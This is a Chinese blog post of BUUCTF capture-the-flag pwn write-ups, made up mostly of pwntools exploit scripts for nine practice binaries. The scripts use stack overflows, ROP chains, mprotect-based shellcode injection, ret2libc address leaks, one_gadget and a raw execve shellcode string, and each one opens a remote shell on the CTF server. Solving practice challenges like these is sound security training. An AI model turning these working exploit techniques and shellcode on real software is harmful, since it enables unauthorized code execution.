buuctf pwn(2)


阅读数: 116次   
字数统计: 1.1k字   |   阅读时长: 6分

get_started_3dsctf_2016
not_the_same_3dsctf_2016
ciscn_2019_n_8
bjdctf_2020_babystack
one_gadget
baby_rop
level2_x64
ciscn_2019_n_5
2018_rop

@TOC

get_started_3dsctf_2016

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
#!/usr/bin/env python3
from pwn import*
context(os="linux",arch="i386",log_level="debug")
content=1

elf=ELF("get_started_3dsctf_2016")
'''
print(elf.bss())
print(elf.bss()% (4 * 1024))
print(elf.bss() & ~(elf.bss()% (4 * 1024)))
'''

def main():
    if content == 0:
        io = process("./get_started_3dsctf_2016")
    else:
        io = remote("node3.buuoj.cn", 25220)

    mprot_addr=elf.symbols['mprotect']
    read_addr = elf.symbols['read']
    pop_3_addr=0x809e4c5
    start_addr=0x080ea000
    lenn=0x100

    payload=b'a'*(0x38)+p32(mprot_addr)+p32(pop_3_addr)+p32(start_addr)+p32(lenn)+p32(7)
    payload+=p32(read_addr)+p32(pop_3_addr)+p32(0)+p32(start_addr)+p32(0x100)+p32(start_addr)
    io.sendline(payload)
    payload=asm(shellcraft.sh())
    io.sendline(payload)
    io.interactive()

main()

'''def main():
    if content==0:
        io=process("./get_started_3dsctf_2016")
    else:
        io=remote("node3.buuoj.cn",25220)

    get_flag_addr=0x80489A0

    payload=b'a'*(0x38)+p32(get_flag_addr)+p32(0x0804E6A0)+p32(0x308CD64F)+p32(0x195719D1)
    io.sendline(payload)
    io.interactive()

main()
'''

not_the_same_3dsctf_2016

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#!/usr/bin/env python3
from pwn import*
context(os="linux",arch="i386",log_level="debug")
content=1

elf=ELF("not_the_same_3dsctf_2016")
mprot_addr=elf.symbols['mprotect']
read_addr=elf.symbols['read']
pop_3_addr=0x809e3e5
start_addr=0x080ea000

def main():
    if content==0:
        io=process("./not_the_same_3dsctf_2016")
    else:
        io=remote("node3.buuoj.cn",27830)

    payload=b'a'*(0x2D)+p32(mprot_addr)+p32(pop_3_addr)+p32(start_addr)+p32(0x100)+p32(7)
    payload+=p32(read_addr)+p32(pop_3_addr)+p32(0)+p32(start_addr)+p32(0x100)+p32(start_addr)
    #io.recvuntil("b0r4 v3r s3 7u 4h o b1ch4o m3m0... ")
    io.sendline(payload)
    payload=asm(shellcraft.sh())
    io.sendline(payload)
    io.interactive()

main()

ciscn_2019_n_8

在这里插入图片描述
scanf输入一个字符串,如果var[13]为17(DWORD)得到shell
在这里插入图片描述

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#!/usr/bin/env python3
from pwn import*
context(os="linux",arch="i386",log_level="debug")
content=1

def main():
    if content==0:
        io=process("./ciscn_2019_n_8")
    else:
        io=remote("node3.buuoj.cn",28226)
    #payload=p32(17)*15   #(x)
    payload=p32(17)*14+p32(0)   
    #payload = p32(17) * 14  #这种情况可以成功是因为第15个位置恰好是p32(0)
    #payload = b'aaaa' * 13 + p64(17)
    io.sendlineafter("What's your name?",payload)
    io.interactive()
main()

bjdctf_2020_babystack

在这里插入图片描述
输入一个数,可以控制read读取的字符个数
在这里插入图片描述
在这里插入图片描述

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#!/usr/bin/env python3
from pwn import*
context(os="linux",arch="amd64",log_level="debug")
content=1

def main():
    if content==0:
        io=process("./bjdctf_2020_babystack")
    else:
        io=remote("node3.buuoj.cn",26506)
    sys_addr=0x04006EA
    payload=b'a'*(0x10+0x8)+p64(sys_addr)
    io.sendlineafter("[+]Please input the length of your name:",b'1000')
    io.sendlineafter("[+]What's u name?",payload)
    io.interactive()
main()

one_gadget

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#!/usr/bin/env python3
from pwn import*
context(os="linux",arch="amd64",log_level="debug")
content=1

elf=ELF("one_gadget")
libc=ELF("libc-2.29.so")
printf_libc=libc.symbols['printf']
ogg_libc=0x106ef8

def main():
    if content==0:
        io=process("./one_gadget")
    else:
        io=remote("node3.buuoj.cn",28497)
    io.recvuntil("here is the gift for u:0x")
    printf_addr=int(io.recv(12), 16)
    #printf_addr=u64(io.recv(7)[:-1].ljust(8,b'\x00'))
    libcbase=printf_addr-printf_libc
    ogg_addr=libcbase+ogg_libc
    payload=ogg_addr
    io.recvuntil('Give me your one gadget:')
    io.sendline(str(payload))
    io.interactive()
main()


baby_rop

在这里插入图片描述

在这里插入图片描述

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#!/usr/bin/env python3
from pwn import *
context(os="linux",arch="amd64",log_level="debug")
content=1

def main():
    if content==0:
        io=process("./babyroppp")
    else:
        io=remote("node3.buuoj.cn",28216)
    pop_addr=0x400683
    payload=b'a'*(0x10+8)+p64(pop_addr)+p64(0x0601048)+p64(0x0400490)
    io.sendline(payload)
    io.recv()
    io.interactive()
main()

level2_x64

同baby_rop

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#!/usr/bin/env python3
from pwn import*
context(os="linux",arch="amd64",log_level="debug")
content=1

def main():
    if content==0:
        io=process("./level2_x64")
    else:
        io=remote("node3.buuoj.cn",25653)

    pop_addr=0x4006b3
    sys_addr=0x4004C0
    binsh_addr=0x600A90

    payload=b'a'*(0x80+8)+p64(pop_addr)+p64(binsh_addr)+p64(sys_addr)
    io.sendline(payload)
    io.interactive()
main()

ciscn_2019_n_5

一开始以为gets(text,name)是从name处读入数据,后来发现仍然是从控制台输入text,搜了gets函数,只有一个参数,这里不知道是不是ida的问题
在这里插入图片描述
在name处注入shellcode,gets处溢出ret到name处执行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#!/usr/bin/env python3
from pwn import*
context(os="linux",arch="amd64",log_level="debug")
content=1

def main():
    if content==0:
        io=process("./ciscn_2019_n_5")
    else:
        io=remote("node3.buuoj.cn",25702)
    payload="\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"
    io.sendlineafter("tell me your name",payload)
    payload=b'a'*(0x20+8)+p64(0x0601080)
    io.sendlineafter("What do you want to say to me?",payload)
    io.interactive()
main()

2018_rop

libc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
#!/usr/bin/env python3
from pwn import *
context(os="linux",arch="i386",log_level="debug")
content=1

#elf
elf=ELF("2018_rop")
main_addr=0x080484C6

#libc
libc=ELF("u32libc-2.27.so")
write_libc=libc.symbols['write']
sys_libc=libc.symbols['system']
binsh_libc=next(libc.search(b'/bin/sh'))

def main():
    if content==0:
        io=process("./2018_rop")
    else:
        io=remote("node3.buuoj.cn",26854)
    #plt->got
    payload=b'a'*(0x88+4)+p32(main_addr)
    io.sendline(payload)
    #io.recvline()
    #leak
    write_plt=elf.plt['write']
    write_got=elf.got['write']
    payload=b'a'*(0x88+4)+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)
    io.sendline(payload)
    #io.recvline()
    write_addr=u32(io.recv(4))
    #count
    libcbase=write_addr-write_libc
    sys_addr=libcbase+sys_libc
    binsh_addr=libcbase+binsh_libc
    #getshell_payload
    payload=b'a'*(0x88+4)+p32(sys_addr)+b'aaaa'+p32(binsh_addr)
    io.sendline(payload)
    #io.recvline()
    #io.recv()
    io.interactive()
main()


-------------本文结束感谢您的阅读-------------



谢谢你请我吃糖果

扫一扫,分享到微信

微信分享二维码

Related Issues not found

Please contact @qingmu-z to initialize the comment

本站总访问量11268 本站访客数7513人次